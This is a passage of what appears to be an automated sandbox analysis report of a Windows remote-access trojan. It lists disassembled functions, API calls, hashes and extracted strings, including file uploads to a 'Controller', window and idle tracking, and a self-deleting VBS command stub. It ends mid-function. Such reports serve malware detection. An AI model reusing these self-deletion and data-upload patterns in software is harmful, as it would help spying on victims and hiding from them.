                                    • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                    • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                    • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                    • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                    • API String ID: 1332880857-3714951968
                                    • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                    • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                    • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                    • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                    • GetCursorPos.USER32(?), ref: 0041D5E9
                                    • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                    • ExitProcess.KERNEL32 ref: 0041D665
                                    • CreatePopupMenu.USER32 ref: 0041D66B
                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                    • String ID: Close
                                    • API String ID: 1657328048-3535843008
                                    • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                    • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                    • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                    • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$Info
                                    • String ID:
                                    • API String ID: 2509303402-0
                                    • Opcode ID: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                                    • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                    • Opcode Fuzzy Hash: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                                    • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                    • __aulldiv.LIBCMT ref: 00408D4D
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                    • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                    • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                    • API String ID: 3086580692-2582957567
                                    • Opcode ID: 458f7c61ed2a9088e6a560085f828f9ccf2dcfbd0498d162dbd94850580e736e
                                    • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                    • Opcode Fuzzy Hash: 458f7c61ed2a9088e6a560085f828f9ccf2dcfbd0498d162dbd94850580e736e
                                    • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00001388), ref: 0040A740
                                      • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                      • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                      • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                      • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                    • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                    • API String ID: 3795512280-1152054767
                                    • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                    • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                    • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                    • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0045130A
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                    • _free.LIBCMT ref: 004512FF
                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00451321
                                    • _free.LIBCMT ref: 00451336
                                    • _free.LIBCMT ref: 00451341
                                    • _free.LIBCMT ref: 00451363
                                    • _free.LIBCMT ref: 00451376
                                    • _free.LIBCMT ref: 00451384
                                    • _free.LIBCMT ref: 0045138F
                                    • _free.LIBCMT ref: 004513C7
                                    • _free.LIBCMT ref: 004513CE
                                    • _free.LIBCMT ref: 004513EB
                                    • _free.LIBCMT ref: 00451403
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                    • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                    • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                    • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00419FB9
                                    • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                    • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                    • GetLocalTime.KERNEL32(?), ref: 0041A105
                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                    • API String ID: 489098229-1431523004
                                    • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                    • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                    • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                    • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                      • Part of subcall function 004136F8: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                      • Part of subcall function 004136F8: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                      • Part of subcall function 004136F8: RegCloseKey.KERNELBASE(00000000), ref: 00413738
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                    • ExitProcess.KERNEL32 ref: 0040D9C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                    • API String ID: 1913171305-3159800282
                                    • Opcode ID: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                                    • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                    • Opcode Fuzzy Hash: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
                                    • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                    • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                    • Opcode Fuzzy Hash: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                    • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                    • closesocket.WS2_32(000000FF), ref: 00404E5A
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                    • String ID:
                                    • API String ID: 3658366068-0
                                    • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                    • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                    • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                    • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                    • GetLastError.KERNEL32 ref: 00455CEF
                                    • __dosmaperr.LIBCMT ref: 00455CF6
                                    • GetFileType.KERNEL32(00000000), ref: 00455D02
                                    • GetLastError.KERNEL32 ref: 00455D0C
                                    • __dosmaperr.LIBCMT ref: 00455D15
                                    • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                    • CloseHandle.KERNEL32(?), ref: 00455E7F
                                    • GetLastError.KERNEL32 ref: 00455EB1
                                    • __dosmaperr.LIBCMT ref: 00455EB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                    • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                    • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                    • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                    • __alloca_probe_16.LIBCMT ref: 00453EEA
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                    • __alloca_probe_16.LIBCMT ref: 00453F94
                                    • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                    • __freea.LIBCMT ref: 00454003
                                    • __freea.LIBCMT ref: 0045400F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                    • String ID: \@E
                                    • API String ID: 201697637-1814623452
                                    • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                    • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                    • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                    • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID: \&G$\&G$`&G
                                    • API String ID: 269201875-253610517
                                    • Opcode ID: f843711e33ddf2e4d4c3baca2ca6b2426e0ab7997c39caf6bf5fac4d84d12184
                                    • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                    • Opcode Fuzzy Hash: f843711e33ddf2e4d4c3baca2ca6b2426e0ab7997c39caf6bf5fac4d84d12184
                                    • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 65535$udp
                                    • API String ID: 0-1267037602
                                    • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                    • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                    • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                    • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0040AD38
                                    • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                    • GetForegroundWindow.USER32 ref: 0040AD49
                                    • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                    • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                    • String ID: [${ User has been idle for $ minutes }$]
                                    • API String ID: 911427763-3954389425
                                    • Opcode ID: 1fd890e2d21f894b0b3b077f7e4e96656cdfff5721ec9a02ea1a5f8763c76f61
                                    • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                    • Opcode Fuzzy Hash: 1fd890e2d21f894b0b3b077f7e4e96656cdfff5721ec9a02ea1a5f8763c76f61
                                    • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                    • __dosmaperr.LIBCMT ref: 0043A8A6
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                    • __dosmaperr.LIBCMT ref: 0043A8E3
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                    • __dosmaperr.LIBCMT ref: 0043A937
                                    • _free.LIBCMT ref: 0043A943
                                    • _free.LIBCMT ref: 0043A94A
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                    • String ID:
                                    • API String ID: 2441525078-0
                                    • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                    • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                    • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                    • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                    • TranslateMessage.USER32(?), ref: 0040557E
                                    • DispatchMessageA.USER32(?), ref: 00405589
                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
